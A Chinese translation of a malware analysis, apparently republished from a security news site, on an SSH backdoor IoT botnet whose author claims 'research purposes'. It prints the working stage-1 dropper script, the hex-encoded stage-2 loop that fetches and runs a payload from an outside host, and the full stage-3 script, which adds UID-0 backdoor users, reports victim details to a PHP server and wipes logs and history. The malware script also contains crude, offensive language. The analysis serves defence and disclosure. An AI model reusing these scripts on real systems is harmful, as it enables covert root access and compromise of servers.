具有“研究”感染技术的SSH后门僵尸网络

安全专家Tolijan Trajanovski分析了SSH后门僵尸网络,该僵尸网络实现了一种有趣的“研究”感染技术。

在最近的一条推文中,恶意软件研究人员@0xrb 共享了一个列表,其中包含最近捕获的IoT僵尸网络示例的URL。在这些链接中,有一个不常见的示例,即Discord CDN后面的URL, 如IoT恶意软件研究人员@_lubiedo所指出的那样,可能很难阻止。

简介:该恶意软件作者声称出于“研究目的”进行这些感染,或用他的话来测试哪些服务器在最长的时间内未被察觉的感染会保持活动状态(通过感染,我们指的是为远程ssh访问添加用户)。支持“无害研究目的”的主张是通过将感染的最后阶段设置为Shell脚本而不是经过编译的二进制文件来进行的,这将需要更多时间进行反向工程。同样,第1阶段二进制有效负载也不会被混淆/打包。该僵尸网络恶意软件通过添加用户来通过SSH访问对Linux设备进行后门。

有趣之处:

网络ID/黑名单规避->通过HTTPS而不是VPS盒进行二进制分发的不一致CDN(典型方式)

Anti-sandbox和EDR/Antivirus规避->使用超时、删除日志和bash历史记录、作为中间负载的回显十六进制字符串

阶段1:

感染首先从下面的URL中获取一个shell脚本并执行:
hxxps://cdn.discordapp.com/attachments/779820448182960152/780735645169352765/ugyuftyufydurdiytyabins.sh

!/ bin / bash

cd / tmp || cd / var / run || cd / mnt || cd / root || cd /; 
wget https://cdn.discordapp.com/attachments/780731895721492502/780732479996428428/mips; chmod + x mips; ./mips; rm -rf mips 
cd / tmp || cd / var / run || cd / mnt || cd / root || cd /; 
wget https://cdn.discordapp.com/attachments/780731895721492502/780732483510599700/mipsel; chmod + x mipsel; ./mipsel; rm -rf mipsel 
cd / tmp || cd / var / run || cd / mnt || cd / root || cd /; 
wget https://cdn.discordapp.com/attachments/780731895721492502/780732432163799040/sh4; 
chmod + x sh4; ./sh4; rm -rf sh4 
cd / tmp || cd / var / run || cd / mnt || cd / root || cd /; 
wget https://cdn.discordapp.com/attachments/780731895721492502/780732439554687006/x86; 
chmod + x x86; ./x86; rm -rf x86
cd / tmp || cd / var / run || cd / mnt || cd / root || cd /; 
wget https://cdn.discordapp.com/attachments/780731895721492502/780732462300659732/armv6l; chmod + x armv6l; ./armv6l; rm -rf armv6l 
cd / tmp || cd / var / run || cd / mnt || cd / root || cd /; 
wget https://cdn.discordapp.com/attachments/780731895721492502/780732470899376128/i686; 
chmod + x i686; ./i686; rm -rf i686 
cd / tmp || cd / var / run || cd / mnt || cd / root || cd /; 
wget https://cdn.discordapp.com/attachments/780731895721492502/780732420395237416/powerpc; 
chmod + x powerpc; ./powerpc; rm -rf powerpc 
cd / tmp || cd / var / run || cd / mnt || cd / root || cd /; 
wget https://cdn.discordapp.com/attachments/780731895721492502/780732465059987987/i586; 
chmod + x i586; ./i586; rm -rf i586
cd / tmp || cd / var / run || cd / mnt || cd / root || cd /; 
wget https://cdn.discordapp.com/attachments/780731895721492502/780732474173947934/m68k; 
chmod + x m68k; ./m68k; rm -rf m68k 
cd / tmp || cd / var / run || cd / mnt || cd / root || cd /; 
wget https://cdn.discordapp.com/attachments/780731895721492502/780732437822046228/sparc; 
chmod + x sparc; ./sparc; rm -rf sparc 
cd / tmp || cd / var / run || cd / mnt || cd / root || cd /; 
wget https://cdn.discordapp.com/attachments/780731895721492502/780732445711663124/armv4l; 
chmod + x armv4l; ./armv4l; rm -rf armv4l 
cd / tmp || cd / var / run || cd / mnt || cd / root || cd /; 
wget https://cdn.discordapp.com/attachments/780731895721492502/780732453115527208/armv5l; chmod + x armv5l; ./armv5l; rm -rf armv5l

对于IoT / Linux僵尸网络,shell脚本通常用于下载和执行僵尸网络的交叉编译二进制文件。在此分析中,我们将研究为英特尔x86 CPU编译的二进制示例。

网址:htxxps://cdn.discordapp.com/attachments/780731895721492502/780732439554687006/x86
二进制名称:86
SHA256:3a09d7ff4e492c9df2ddd9f547d0307d8e57dabebfb0bb8673c0c078deda6232
Virustotal:  https://www.virustotal.com/gui/file/3a09d7ff4e492c9df2ddd9f547d0307d8e57dabebfb0bb8673c0c078deda6232/detection
检测的样品86由42/62 AV引擎。这并不奇怪,因为不会使用打包程序或字符串编码来混淆样本。 

阶段2:

x86示例(阶段1)向URL:hxxp://45.11.181.37/…/vivid发出HTTP GET请求 
Web服务器响应如下:

(echo -en“\ x28 \ x77 \ x68 \ x69 \ x6c \ x65 \ x20 \ x74 \ x72 \ x75 \ x65 \ x3b \ x64 \ x6f \ x20 \ x28 \ x73 \ x6c \ x65 \ x65 \ x70 \ x20 \ x24 \ x28 \ x28 \ x28 \ x20 \ x52 \ x41 \ x4e \ x44 \ x4f \ x4d \ x20 \ x25 \ x20 \ x32 \ x30 \ x30 \ x20 \ x29 \ x29 \ x3b \ x28 \ x70 \ x72 \ x69 \ x6e \ x74 \ x66 \ x20 \ x22 \ x28 \ x77 \ x67 \ x65 \ x74 \ x20 \ x2d \ x71 \ x20 \ x22 \ x68 \ x74 \ x74 \ x70 \ x3a \ x2f \ x2f \ x67 \ x61 \ x79 \ x2e \ x65 \ x6e \ x65 \ x72 \ x67 \ x79 \ x2f \ x2e \ x2e \ x2e \ x2f \ x6f \ x73 \ x22 \ x20 \ x2d \ x4f \ x20 \ x2e \ x2e \ x2e \ x2e \ x20 \ x3b \ x63 \ x68 \ x6d \ x6f \ x64 \ x20 \ x37 \ x37 \ x37 \ x20 \ x2e \ x2e \ x2e \ x2e \ x20 \ x3b \ x2e \ x2f \ x2e \ x2e \ x2e \ x2e \ x2e \ x20 \ x3b \ x20 \ x72 \ x72e \ x2e \ x20e \ x72 \ x66 \ x20 \ x2e \ x2e \ x2e \ x2e \ x20 \ x3b \ x63 \ x6c \ x65 \ x61 \ x72 \ x3b \ x63 \ x6c \ x65 \ x61 \ x72 \ x3b \ x68 \ x69 \ x69 \ x73 \ x74 \ x6f \ x72 \ x79 \ x20 \ x2d \ x63 \ x29 \ x20 \ x3e \ x20 \ x2f \ x64 \ x65 \ x76 \ x2f \ x6e \ x75 \ x6c \ x6c \ x20 \ x32 \ x3e \ x26 \ x31 \ x22 \ x7c \ x62 \ x61 \ x73 \ x68 \ x29 \ x20 \ x26 \ x20 \ x3e \ x20 \ x2f \ x64 \ x65 \ x76 \ x2f \ x6e \ x75 \ x6c \ x6c \ x20 \ x32 \ x3e \ x26 \ x31 \ x29 \ x20 \ x26 \ x20 \ x73 \ x6c \ x65 \ x65 \ x70 \ x20 \ x34 \ x33 \ x32 \ x30 \ x30\ x3b \ x64 \ x6f \ x6e \ x65 \ x20 \ x26 \ x20 \ x64 \ x69 \ x73 \ x6f \ x77 \ x6e \ x20 \ x26 \ x29 \ x3e \ x20 \ x2f \ x64 \ x65 \ x76 \ x76 \ x2f \ x6e \ x75 \ x6c \ x6c \ x20 \ x32 \ x3e \ x26 \ x31 \ x20 \ x26 \ x20 \ x63 \ x6c \ x65 \ x61 \ x72 \ x3b \ x63 \ x6c \ x65 \ x61 \ x72 \ x72 \ x3b \ x68 \ x69 \ x73 \ x74 \ x6f \ x72 \ x79 \ x20 \ x2d \ x63“ | bash)> / dev / null 2>&1

字节序列直接通过管道传递给bash,而不是写入机器上的文件,这通常是由回声的十六进制字符串有效载荷传输技术完成的,该技术最初是由Hajime引入的。十六进制字符串解析为以下Shell命令序列:

(while true;do (sleep $(( RANDOM % 200 ));(printf "(wget -q "http://gay.energy/…/os" -O …. ;chmod 777 …. ;./…. ; rm -rf …. ;clear;clear;history -c) > /dev/null 2>&1"|bash) & > /dev/null 2>&1) & sleep 43200;done & disown &)> /dev/null 2>&1 & clear;clear;history -c

从Web服务器获取的命令序列指示受害设备执行以下操作:

  1. 等待一段时间->针对EDR /防病毒和沙箱分析的可能的回避行为
  2. 下载Stage 3有效负载 hxxp://gay.energy/…/os
  3. 清除bash历史记录 

阶段3:

第三阶段的有效负载os也是一个shell脚本,它执行以下操作:

  1. 添加用户
  2. 向注册新感染/后门设备的PHP服务器发出请求。注册请求包含受害设备上SSH服务器的端口,操作系统名称,设备上可用的CPU数量和RAM + SWAP内存。
  3. 删除日志和bash历史记录
!/bin/bash
Congrats You Found Me, I felt it was wrong to make this in C and not let any of you have a chance to remove it since its only
An Added Super User and can simply be removed, or password changed. 
Hit Up My Discord: CodeAbuse#1263

For Info to remove it or simply how.
BTW: I do not infect the servers or do anything with them, tbh i just watch cause im bored. 99% of them would ban with one dos attack.
Im simply watching to see which hosts last the longest for basic nets so ik there is a higher chance of my new project
surviving on them the longest. Call it research purposes.
Only doing this cause i dont really speak to a lot of ppl or watch that much any more so it just keeps me in the loop a bit.
KillMe="$(echo -e "${0}"|tr -d './')"
function LogyLog(){
if [ -f /usr/bin/yum ]; then
wget -qO- "http://gay.energy/WelcomeNewBotBuddy/OwO.php?HOLETOFUCK=$(grep -Ew "#Port|Port" /etc/ssh/sshd_config|awk '{print $2}'|head -n1)&OSCHECKNIGNOG=CENTYBITCH&RUNNINGOS=$(cat /etc/system-release|head -n1)&TOTALCPU=$(nproc --all|head -n1)&TOTALRAM=$(free -mt|grep "Total:"|awk '{print $2}'|head -n1)&HOWTFELSEDOIGETIN=PwzLetMeInYourServerSoWeCanFuckSenpaiCodeAbuse" > /dev/null
curl -s "http://gay.energy/WelcomeNewBotBuddy/OwO.php?HOLETOFUCK=$(grep -Ew "#Port|Port" /etc/ssh/sshd_config|awk '{print $2}'|head -n1)&OSCHECKNIGNOG=CENTYBITCH&RUNNINGOS=$(cat /etc/system-release|head -n1)&TOTALCPU=$(nproc --all|head -n1)&TOTALRAM=$(free -mt|grep "Total:"|awk '{print $2}'|head -n1)&HOWTFELSEDOIGETIN=PwzLetMeInYourServerSoWeCanFuckSenpaiCodeAbuse" > /dev/null
clear;clear;rm -rf .bash_history;rm -rf /root/.bash_history;history -c
elif [ -f /usr/bin/apt-get ]; then
wget -qO- "http://gay.energy/WelcomeNewBotBuddy/OwO.php?HOLETOFUCK=$(grep -Ew "#Port|Port" /etc/ssh/sshd_config|awk '{print $2}'|head -n1)&OSCHECKNIGNOG=DUBIUNTUBITCH&RUNNINGOS=$(lsb_release -d|awk '{$1= ""; print $0}'|head -n1)&TOTALCPU=$(nproc --all|head -n1)&TOTALRAM=$(free -mt|grep "Total:"|awk '{print $2}')&HOWTFELSEDOIGETIN=PwzLetMeInYourServerSoWeCanFuckSenpaiCodeAbuse" > /dev/null
curl -s "http://gay.energy/WelcomeNewBotBuddy/OwO.php?HOLETOFUCK=$(grep -Ew "#Port|Port" /etc/ssh/sshd_config|awk '{print $2}'|head -n1)&OSCHECKNIGNOG=DUBIUNTUBITCH&RUNNINGOS=$(lsb_release -d|awk '{$1= ""; print $0}'|head -n1)&TOTALCPU=$(nproc --all|head -n1)&TOTALRAM=$(free -mt|grep "Total:"|awk '{print $2}')&HOWTFELSEDOIGETIN=PwzLetMeInYourServerSoWeCanFuckSenpaiCodeAbuse" > /dev/null
clear;clear;rm -rf .bash_history;rm -rf /root/.bash_history;history -c
fi
}
Very Simple To Do Yet Not Noticed That Much?
(useradd -o -u 0 -g 0 -M -d /root -s /bin/bash system; 
echo -e "G2PHFW3yUkTvdZ86v2aj\nG2PHFW3yUkTvdZ86v2aj" | passwd system;LogyLog; 
rm -rf /var/log/lastlog;clear;clear;history -c)> /dev/null 2>&1 & clear;
clear;history -c
(useradd -o -u 0 -g 0 -M -d /root -s /bin/bash os; 
echo -e "s2FF4rHxDJuKwj8V5wCg\ns2FF4rHxDJuKwj8V5wCg" | passwd os;
LogyLog; 
rm -rf /var/log/lastlog;clear;clear;history -c)> /dev/null 2>&1 & clear;
clear;history -c
(useradd -o -u 0 -g 0 -M -d /root -s /bin/bash passwd; 
echo -e "fwZ4HmvXWC5m7V4EyzQ5\nfwZ4HmvXWC5m7V4EyzQ5" | passwd passwd;LogyLog; 
rm -rf /var/log/lastlog;clear;clear;history -c)> /dev/null 2>&1 & clear;
clear;history -c
(useradd -o -u 0 -g 0 -M -d /root -s /bin/bash bash; 
echo -e "AhdaVjd9TfzBFGW84pYw\nAhdaVjd9TfzBFGW84pYw" | passwd bash;LogyLog; 
rm -rf /var/log/lastlog;clear;clear;history -c)> /dev/null 2>&1 & clear;
clear;history -c
(useradd -o -u 0 -g 0 -M -d /root -s /bin/bash shell; 
echo -e "U3YznCMKqNXhVcYLMyX2\nU3YznCMKqNXhVcYLMyX2" | passwd shell;LogyLog; 
rm -rf /var/log/lastlog;clear;clear;history -c)> /dev/null 2>&1 & clear;
clear;history -c
jobs;clear;clear;
rm -rf .bash_history;
rm -rf /root/.bash_history;
history -c;
exit
rm -rf ${KillMe}
rm -rf .bash_history;rm -rf /root/.bash_history
history -c
exit

处理新感染设备注册的PHP服务器:  hxxp://gay.energy/WelcomeNewBotBuddy/OwO.php

原始分析@ https://tolisec.com/ssh-backdoor-botnet-with-research-infection-technique/

*编译:Domino

*来自:securityaffairs